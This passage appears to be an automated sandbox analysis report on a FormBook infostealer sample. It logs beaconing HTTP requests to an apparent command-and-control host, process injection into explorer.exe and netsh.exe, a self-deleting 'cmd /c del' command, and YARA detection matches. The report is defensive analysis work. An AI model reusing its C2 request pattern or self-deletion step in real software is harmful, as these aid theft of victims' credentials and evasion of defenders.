6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.34975134.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:01:32.535267115 CET6164OUTGET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI HTTP/1.1
                                                                        Host: www.activagebenefits.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:01:32.674674034 CET6164INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:01:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b8-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Start time:08:59:23
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\vBugmobiJh.exe'
                                                                        Imagebase:0x2d0000
                                                                        File size:484864 bytes
                                                                        MD5 hash:5B59E521935E56A03255623DF51C1631
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:59:33
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Imagebase:0x150000
                                                                        File size:484864 bytes
                                                                        MD5 hash:5B59E521935E56A03255623DF51C1631
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:59:33
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        Imagebase:0x430000
                                                                        File size:484864 bytes
                                                                        MD5 hash:5B59E521935E56A03255623DF51C1631
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:59:35
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:08:59:49
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\netsh.exe
                                                                        Imagebase:0xf90000
                                                                        File size:82944 bytes
                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:high

                                                                        General

                                                                        Start time:08:59:53
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
                                                                        Imagebase:0x12f0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:08:59:54
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >